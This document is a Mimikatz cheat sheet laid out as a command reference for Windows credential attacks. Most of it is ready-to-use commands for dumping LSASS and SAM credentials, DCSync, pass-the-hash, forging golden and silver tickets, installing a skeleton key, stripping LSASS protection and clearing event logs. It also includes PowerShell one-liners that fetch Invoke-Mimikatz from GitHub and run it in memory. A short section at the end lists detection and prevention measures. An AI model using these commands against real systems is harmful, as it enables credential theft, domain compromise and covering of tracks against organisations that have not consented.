Mimikatz Cheat Sheet

Overview

Mimikatz is a powerful credential dumping and manipulation tool developed by Benjamin Delpy (@gentilkiwi). It can extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory, as well as perform various attacks like pass-the-hash, pass-the-ticket, and golden ticket creation.

⚠️ Warning: Mimikatz is a security testing tool that can be used maliciously. Only use it in environments where you have explicit permission to do so.

Obtaining Mimikatz

Official Repository

• GitHub: https://github.com/gentilkiwi/mimikatz
• Latest Release: https://github.com/gentilkiwi/mimikatz/releases

Pre-compiled Binaries

• mimikatz.exe - 32-bit executable
• mimikatz_trunk.zip - Contains both 32-bit and 64-bit executables

Compilation from Source

git clone https://github.com/gentilkiwi/mimikatz.git
# Open the solution file in Visual Studio and build

Basic Usage

Running Mimikatz

# Run directly
mimikatz.exe

# Run with PowerShell
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"

# Run from memory
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Elevating Privileges

privilege::debug

Getting Help

help
<module>::
<module>::<command> /?

Exiting Mimikatz

exit

Core Modules and Commands

sekurlsa Module (LSASS Memory Access)

Command	Description
sekurlsa::logonpasswords	Extract all logon passwords
sekurlsa::tickets	Extract Kerberos tickets
sekurlsa::ekeys	Extract Kerberos encryption keys
sekurlsa::dpapi	Extract DPAPI master keys
sekurlsa::credman	Extract credentials from Windows Credential Manager
sekurlsa::msv	Extract MSV authentication information
sekurlsa::tspkg	Extract TSPKG authentication information
sekurlsa::wdigest	Extract WDigest authentication information
sekurlsa::kerberos	Extract Kerberos authentication information
sekurlsa::ssp	Extract SSP authentication information
sekurlsa::livessp	Extract LiveSSP authentication information
sekurlsa::cloudap	Extract CloudAP authentication information

lsadump Module (SAM and Active Directory)

Command	Description
lsadump::sam	Extract hashes from the SAM database
lsadump::secrets	Extract LSA secrets
lsadump::cache	Extract cached domain credentials
lsadump::dcsync	Perform DCSync attack to retrieve password data
lsadump::lsa	Extract LSA secrets
lsadump::trust	Extract domain trust keys
lsadump::backupkeys	Extract domain backup keys

kerberos Module (Ticket Manipulation)

Command	Description
kerberos::list	List all Kerberos tickets
kerberos::purge	Purge all Kerberos tickets
kerberos::ptt	Pass-the-ticket (inject a ticket)
kerberos::golden	Create a golden ticket
kerberos::silver	Create a silver ticket
kerberos::tgt	Create a TGT
kerberos::hash	Calculate Kerberos keys from password

crypto Module (Cryptographic Operations)

Command	Description
crypto::certificates	List certificates
crypto::keys	List keys
crypto::system	List system certificates
crypto::capi	List CAPI certificates
crypto::cng	List CNG certificates
crypto::stores	List certificate stores

vault Module (Windows Vault Access)

Command	Description
vault::cred	List credentials in Windows Vault
vault::list	List vault credentials

token Module (Token Manipulation)

Command	Description
token::whoami	Display current token information
token::list	List all tokens
token::elevate	Elevate token privileges
token::revert	Revert token
token::run	Run a process with a token

privilege Module (Privilege Management)

Command	Description
privilege::debug	Enable debug privilege
privilege::driver	Load a driver

event Module (Event Log Management)

Command	Description
event::clear	Clear event logs
event::drop	Drop event logs

ts Module (Terminal Services)

Command	Description
ts::sessions	List terminal services sessions
ts::multirdp	Enable multiple RDP sessions

misc Module (Miscellaneous)

Command	Description
misc::cmd	Command prompt
misc::regedit	Registry editor
misc::taskmgr	Task manager
misc::ncroutemon	Network connection route monitor
misc::detours	Detours detection
misc::skeleton	Install skeleton key

Common Attack Techniques

Credential Dumping

Extract Logon Passwords

privilege::debug
sekurlsa::logonpasswords

Extract Credentials from SAM

privilege::debug
token::elevate
lsadump::sam

Extract Cached Domain Credentials

privilege::debug
lsadump::cache

Extract from LSASS Dump

# Create dump with Task Manager or procdump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Pass-the-Hash Attacks

Pass-the-Hash with NTLM

sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D

Pass-the-Hash with AES Keys

sekurlsa::pth /user:Administrator /domain:contoso.local /aes256:E52CAC67419A9A224A3B108F3FA6CB6D1234567890ABCDEF1234567890ABCDEF

Over-Pass-the-Hash (Convert NTLM to Kerberos)

sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D /run:powershell.exe

DCSync Attack

Extract NTLM Hashes for All Users

lsadump::dcsync /domain:contoso.local /all

Extract NTLM Hash for Specific User

lsadump::dcsync /domain:contoso.local /user:Administrator

Extract NTLM Hash for KRBTGT (for Golden Ticket)

lsadump::dcsync /domain:contoso.local /user:krbtgt

Kerberos Ticket Attacks

List Kerberos Tickets

kerberos::list

Create a Golden Ticket

# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ticket:OUTPUT_FILE
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:HASH /ticket:golden.kirbi

Create a Silver Ticket

# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER /service:SERVICE /rc4:SERVICE_HASH /ticket:OUTPUT_FILE
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:server.contoso.local /service:HTTP /rc4:HASH /ticket:silver.kirbi

Pass-the-Ticket

kerberos::ptt golden.kirbi

Purge Tickets

kerberos::purge

Skeleton Key Attack

privilege::debug
misc::skeleton

Advanced Techniques

DPAPI Master Key Extraction

sekurlsa::dpapi

LSA Protection Bypass

# Load mimikatz driver
mimidrv::service

# Enable debug privilege
privilege::debug

# Load driver
!+

# Remove LSASS protection
!processprotect /process:lsass.exe /remove

# Extract credentials
sekurlsa::logonpasswords

Remote Operations

# Create process dump of LSASS
# Using Task Manager or procdump:
# procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Analyze dump file
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Extract Credentials from Windows Credential Manager

vault::cred
vault::list

Extract Domain Backup Keys

lsadump::backupkeys /system:dc01.contoso.local /export

Command Examples with Parameters

sekurlsa::logonpasswords

sekurlsa::logonpasswords [/patch]

sekurlsa::pth

sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes128:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes256:HASH [/run:COMMAND]

lsadump::dcsync

lsadump::dcsync /domain:DOMAIN /user:USERNAME [/guid:\\\\{object-guid\\\\}]
lsadump::dcsync /domain:DOMAIN /all [/csv]

kerberos::golden

kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:HASH [/id:USER_ID] [/groups:GROUP_IDS] [/ticket:OUTPUT_FILE]

kerberos::ptt

kerberos::ptt TICKET_FILE

Defensive Measures

Detection Methods

• Monitor for process creation of mimikatz.exe or suspicious processes accessing lsass.exe
• Monitor for suspicious LSASS memory access
• Monitor for DCSync operations (replication requests from non-DC machines)
• Monitor for ticket creation and manipulation
• Monitor for privilege escalation

Prevention Methods

• Enable LSA Protection (RunAsPPL) reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
• Enable Credential Guard (Windows 10/Server 2016+)
• Implement Protected Users group
• Disable WDigest authentication reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 0 /f
• Implement Just Enough Administration (JEA)
• Regular password rotation
• Limit administrative privileges
• Use strong passwords

Resources

• Official GitHub Repository
• Mimikatz Wiki
• ADSecurity Mimikatz Guide
• MITRE ATT&CK - Credential Dumping
• MITRE ATT&CK - Pass the Hash
• MITRE ATT&CK - Pass the Ticket